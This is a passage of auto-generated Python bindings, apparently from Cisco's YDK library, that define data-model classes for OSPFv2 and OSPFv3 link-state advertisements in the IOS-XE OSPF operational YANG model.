self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
])
self.e_flag = None
self._segment_path = lambda: "flags"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value)
class LinkData(Entity):
"""
OSPFv3 Link data
.. attribute:: rtr_priority
Router priority of the interce
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: link_local_interface_address
The originating router's link\-local interface address on the link
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: num_of_prefixes
Number of prefixes
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: lsa_id_options
Link data LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, self).__init__()
self.yang_name = "link-data"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])),
('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])),
('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])),
('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])),
])
self.rtr_priority = None
self.link_local_interface_address = None
self.num_of_prefixes = None
self.lsa_id_options = Bits()
self._segment_path = lambda: "link-data"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value)
class IaPrefix(Entity):
"""
OSPFv3 Intra area prefixes
.. attribute:: referenced_ls_type
Referenced Link State type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: referenced_link_state_id
Referenced Link State ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: referenced_adv_router
Referenced Advertising Router
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: num_of_prefixes
Number of prefixes
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, self).__init__()
self.yang_name = "ia-prefix"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])),
('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])),
])
self.referenced_ls_type = None
self.referenced_link_state_id = None
self.referenced_adv_router = None
self.num_of_prefixes = None
self._segment_path = lambda: "ia-prefix"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value)
class Ospfv3Link(Entity):
"""
OSPFv3 links
.. attribute:: interface_id (key)
Interface ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: neighbor_interface_id (key)
Neighbor interface ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: neighbor_router_id (key)
Neighbor router ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: type
Link type
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: metric
Metric
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Link, self).__init__()
self.yang_name = "ospfv3-link"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])),
('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])),
('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])),
('type', (YLeaf(YType.uint8, 'type'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.interface_id = None
self.neighbor_interface_id = None
self.neighbor_router_id = None
self.type = None
self.metric = None
self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value)
class Ospfv3Prefix(Entity):
"""
OSPFv3 prefix\-list
.. attribute:: prefix (key)
Prefix
**type**\: str
**config**\: False
.. attribute:: prefix_options
Prefix options
**type**\: str
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, self).__init__()
self.yang_name = "ospfv3-prefix"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['prefix']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
])
self.prefix = None
self.prefix_options = None
self._segment_path = lambda: "ospfv3-prefix" + "[prefix='" + str(self.prefix) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, ['prefix', 'prefix_options'], name, value)
class Ospfv3IaPrefix(Entity):
"""
OSPFv3 intra\-area prefix\-list
.. attribute:: prefix (key)
Prefix
**type**\: str
**config**\: False
.. attribute:: prefix_options
Prefix options
**type**\: str
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, self).__init__()
self.yang_name = "ospfv3-ia-prefix"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['prefix']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
])
self.prefix = None
self.prefix_options = None
self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value)
class IntfMultiTopology(Entity):
"""
OSPF interface topology
.. attribute:: name (key)
One of the topology enabled on this interface
**type**\: str
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfMultiTopology, self).__init__()
self.yang_name = "intf-multi-topology"
self.yang_parent_name = "ospf-interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('name', (YLeaf(YType.str, 'name'), ['str'])),
])
self.name = None
self._segment_path = lambda: "intf-multi-topology" + "[name='" + str(self.name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfMultiTopology, ['name'], name, value)
class AreaScopeLsa(Entity):
"""
List of OSPF area scope LSA
.. attribute:: lsa_type (key)
OSPF link scope LSA type
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: area_scope_lsa
List of OSPF link scope LSAs
**type**\: list of :py:class:`AreaScopeLsa_ <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa, self).__init__()
self.yang_name = "area-scope-lsa"
self.yang_parent_name = "ospf-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['lsa_type']
self._child_classes = OrderedDict([("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_))])
self._leafs = OrderedDict([
('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])),
])
self.lsa_type = None
self.area_scope_lsa = YList(self)
self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa, ['lsa_type'], name, value)
class AreaScopeLsa_(Entity):
"""
List of OSPF link scope LSAs
.. attribute:: lsa_type (key)
LSA Type
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: adv_router (key)
Advertising router
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: decoded_completed
The OSPF LSA body is fully decoded
**type**\: bool
**config**\: False
.. attribute:: raw_data
The complete LSA in network byte order as received/sent over the wire
**type**\: list of int
**range:** 0..255
**config**\: False
.. attribute:: ospfv2_lsa
OSPFv2 LSA
**type**\: :py:class:`Ospfv2Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa>`
**config**\: False
.. attribute:: ospfv2_link
Router LSA link
**type**\: list of :py:class:`Ospfv2Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link>`
**config**\: False
.. attribute:: ospfv2_topology
Summary LSA
**type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Topology>`
**config**\: False
.. attribute:: ospfv2_external
External LSA
**type**\: list of :py:class:`Ospfv2External <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2External>`
**config**\: False
.. attribute:: ospfv3_lsa
OSPFv3 LSA
**type**\: :py:class:`Ospfv3Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa>`
**config**\: False
.. attribute:: ospfv3_link
OSPFv3 links
**type**\: list of :py:class:`Ospfv3Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Link>`
**config**\: False
.. attribute:: ospfv3_prefix
OSPFv3 prefix\-list
**type**\: list of :py:class:`Ospfv3Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Prefix>`
**config**\: False
.. attribute:: ospfv3_ia_prefix
OSPFv3 intra\-area prefix\-list
**type**\: list of :py:class:`Ospfv3IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3IaPrefix>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_, self).__init__()
self.yang_name = "area-scope-lsa"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['lsa_type','adv_router']
self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2External)), ("ospfv3-lsa", ("ospfv3_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Link)), ("ospfv3-prefix", ("ospfv3_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Prefix)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3IaPrefix))])
self._leafs = OrderedDict([
('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])),
('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])),
('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])),
('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])),
])
self.lsa_type = None
self.adv_router = None
self.decoded_completed = None
self.raw_data = []
self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa()
self.ospfv2_lsa.parent = self
self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa"
self.ospfv3_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa()
self.ospfv3_lsa.parent = self
self._children_name_map["ospfv3_lsa"] = "ospfv3-lsa"
self.ospfv2_link = YList(self)
self.ospfv2_topology = YList(self)
self.ospfv2_external = YList(self)
self.ospfv3_link = YList(self)
self.ospfv3_prefix = YList(self)
self.ospfv3_ia_prefix = YList(self)
self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']" + "[adv-router='" + str(self.adv_router) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_, ['lsa_type', 'adv_router', 'decoded_completed', 'raw_data'], name, value)
class Ospfv2Lsa(Entity):
"""
OSPFv2 LSA
.. attribute:: header
Decoded OSPFv2 LSA header data
**type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header>`
**config**\: False
.. attribute:: lsa_body
Decoded OSPFv2 LSA body data
**type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa, self).__init__()
self.yang_name = "ospfv2-lsa"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody))])
self._leafs = OrderedDict()
self.header = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header()
self.header.parent = self
self._children_name_map["header"] = "header"
self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody()
self.lsa_body.parent = self
self._children_name_map["lsa_body"] = "lsa-body"
self._segment_path = lambda: "ospfv2-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa, [], name, value)
class Header(Entity):
"""
Decoded OSPFv2 LSA header data
.. attribute:: lsa_id
LSA ID
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: opaque_type
Opaque type
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: opaque_id
Opaque ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: age
LSA age
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: type
LSA type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: adv_router
LSA advertising router
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: seq_num
LSA sequence number
**type**\: str
**config**\: False
.. attribute:: checksum
LSA checksum
**type**\: str
**config**\: False
.. attribute:: length
LSA length
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: flag_options
LSA options
**type**\: :py:class:`LsaFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.LsaFlagOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header, self).__init__()
self.yang_name = "header"
self.yang_parent_name = "ospfv2-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])),
('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])),
('age', (YLeaf(YType.uint16, 'age'), ['int'])),
('type', (YLeaf(YType.uint16, 'type'), ['int'])),
('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
('length', (YLeaf(YType.uint16, 'length'), ['int'])),
('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])),
])
self.lsa_id = None
self.opaque_type = None
self.opaque_id = None
self.age = None
self.type = None
self.adv_router = None
self.seq_num = None
self.checksum = None
self.length = None
self.flag_options = Bits()
self._segment_path = lambda: "header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value)
class LsaBody(Entity):
"""
Decoded OSPFv2 LSA body data
.. attribute:: num_of_links
Number of links
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: network
Network details
**type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network>`
**config**\: False
.. attribute:: summary_mask
Summary mask
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: external_mask
External mask
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: body_flag_options
LSA body flags
**type**\: :py:class:`Ospfv2LsaBodyFlagsOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2LsaBodyFlagsOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody, self).__init__()
self.yang_name = "lsa-body"
self.yang_parent_name = "ospfv2-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network))])
self._leafs = OrderedDict([
('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])),
('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])),
('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])),
('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])),
])
self.num_of_links = None
self.summary_mask = None
self.external_mask = None
self.body_flag_options = Bits()
self.network = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network()
self.network.parent = self
self._children_name_map["network"] = "network"
self._segment_path = lambda: "lsa-body"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value)
class Network(Entity):
"""
Network details
.. attribute:: network_mask
IP network mask
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: attached_router
List of the routers attached to the network
**type**\: list of int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network, self).__init__()
self.yang_name = "network"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])),
('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
])
self.network_mask = None
self.attached_router = []
self._segment_path = lambda: "network"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value)
class Ospfv2Link(Entity):
"""
Router LSA link
.. attribute:: link_id (key)
Link ID
